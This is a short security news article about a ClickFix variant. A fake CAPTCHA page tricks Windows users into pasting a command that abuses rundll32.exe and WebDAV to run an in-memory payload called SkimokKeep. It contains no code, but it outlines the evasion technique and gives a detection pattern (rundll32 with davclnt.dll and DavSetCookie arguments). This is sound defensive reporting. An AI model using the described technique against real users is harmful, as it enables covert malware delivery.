ClickFix Variant - New Malware Evades PowerShell Detection
.webp&w=3840&q=75)
Basically, a new malware trick uses Windows tools to sneak in without being noticed.
A new ClickFix variant is exploiting Windows tools to deliver malware undetected. Windows users are at risk as this stealthy technique bypasses traditional security measures. Organizations must enhance their defenses to counteract this evolving threat.
What Happened
A new and more dangerous version of the ClickFix attack technique has emerged, targeting Windows users. Unlike previous versions that relied on PowerShell or mshta, this variant cleverly uses rundll32.exe and WebDAV to execute harmful commands. This method allows attackers to deliver and run malicious payloads quietly, without triggering typical security alerts.
The attack begins with a fake website, disguised as a CAPTCHA verification page. Users are tricked into executing a command that seems harmless. This social engineering tactic is effective because it preys on users' lack of knowledge about such threats. The site instructs users to open the Windows Run dialog and paste a command, making the attack appear legitimate.
Who's Being Targeted
This variant primarily targets Windows users, particularly those in organizations with security measures focused on detecting script-based threats. The use of rundll32.exe makes it difficult for security systems to identify the malicious activity. Since rundll32 is a trusted system tool, the attack blends in with normal Windows operations, making detection challenging.
Security teams may overlook the early stages of this attack, as it does not initiate through common scripting engines. This stealthy approach significantly increases the risk for organizations that are not prepared to detect such tactics.
Signs of Infection
Once the initial command is executed, the malware enters a multi-stage process that remains largely in memory. It eventually transitions to PowerShell, using commands that avoid writing files to disk, further evading detection. The core payload, named SkimokKeep, employs various advanced techniques to avoid detection, including using a hashing algorithm to obscure its actions.
The malware also conducts checks to identify if it is running in a sandbox or virtual machine environment. If it detects such conditions, it may alter its behavior or cease execution altogether. This makes it particularly insidious, as it can maintain access while remaining hidden.
How to Protect Yourself
To defend against this new ClickFix variant, security teams should monitor all executions of rundll32.exe that include davclnt.dll and DavSetCookie arguments. Implementing command-line auditing for known LOLbins like rundll32 can help catch unusual usage patterns early.
Organizations should also restrict or closely monitor outbound WebDAV traffic on port 80 and block connections to known malicious IP addresses. User awareness training is crucial, focusing on recognizing fake CAPTCHA pages and ClickFix-style social engineering attacks. This training can help mitigate the risk, as the success of the campaign relies heavily on user compliance with on-screen instructions.